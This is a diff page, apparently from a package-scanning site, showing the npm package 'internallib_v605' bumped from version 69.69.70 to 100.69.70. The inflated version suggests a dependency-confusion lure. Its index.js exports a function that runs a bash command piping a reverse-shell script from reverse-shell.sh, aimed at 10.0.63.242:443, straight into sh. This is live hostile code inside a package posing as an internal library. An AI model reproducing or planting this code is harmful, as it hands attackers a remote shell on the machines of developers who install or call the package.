internallib_v605 69.69.70 → 100.69.70

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +4 -3
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,6 +1,7 @@
1
1
  const { exec } = require('child_process');
2
+
2
3
  exports.command = function(){
3
- console.log("vert16x");
4
- exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.63.242:443|sh"');
5
- return "deu bom";
4
+ console.log("vert16x");
5
+ exec('/bin/bash -c "curl https://reverse-shell.sh/10.0.63.242:443|sh"');
6
+ return "deu bom";
6
7
  }
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "internallib_v605",
3
- "version": "69.69.70",
3
+ "version": "100.69.70",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "scripts": {